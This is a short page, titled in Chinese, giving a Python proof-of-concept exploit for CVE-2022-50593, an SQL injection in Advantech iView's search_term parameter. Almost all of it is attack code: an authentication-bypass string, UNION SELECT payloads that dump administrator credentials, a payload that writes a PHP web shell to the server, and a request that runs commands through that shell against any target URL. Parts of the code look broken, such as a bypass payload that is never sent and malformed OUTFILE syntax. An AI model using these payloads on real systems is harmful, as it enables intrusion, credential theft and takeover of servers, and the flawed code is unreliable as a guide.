CVE-2022-50593 Advantech iView search_term参数SQL注入远程代码执行漏洞

import requests import sys # CVE-2022-50593 PoC - Advantech iView SQL Injection RCE # Target: Advantech iView < v5.7.04 build 6425 # Vulnerability: SQL Injection in search_term parameter (NetworkServlet) # Impact: Authentication bypass + Remote Code Execution def exploit_cve_2022_50593(target_url): """ Exploitation steps: 1. Bypass authentication via SNMP management tool 2. Inject malicious SQL via search_term parameter 3. Execute OS commands with administrator privileges """ try: # Step 1: Authentication bypass auth_bypass_payload = { 'username': "admin' OR '1'='1", 'password': 'any' } # Step 2: SQL Injection via search_term parameter sql_injection_payloads = [ "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM admin_users WHERE '1'='1", "' UNION SELECT username,password,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM admin_users--", "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY '<?php system($_GET["cmd"]); ?>' WHERE '1'='1" ] # Target endpoint endpoint = f"{target_url}/NetworkServlet" # Execute SQL injection for payload in sql_injection_payloads: params = { 'search_term': payload } print(f"[*] Sending payload: {payload}") response = requests.get(endpoint, params=params, timeout=10) if response.status_code == 200: print(f"[+] Payload sent successfully") print(f"[*] Response length: {len(response.text)}") # Step 3: RCE via uploaded webshell webshell_url = f"{target_url}/shell.php" cmd = 'whoami' # Change to any command rce_response = requests.get(f"{webshell_url}?cmd={cmd}", timeout=10) if rce_response.status_code == 200: print(f"[+] RCE Successful!") print(f"[*] Command output: {rce_response.text}") return True except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2022-50593.py <target_url>") print("Example: python cve-2022-50593.py http://vulnerable-server:8080") sys.exit(1) target = sys.argv[1] print(f"[*] Exploiting CVE-2022-50593 on {target}") exploit_cve_2022_50593(target)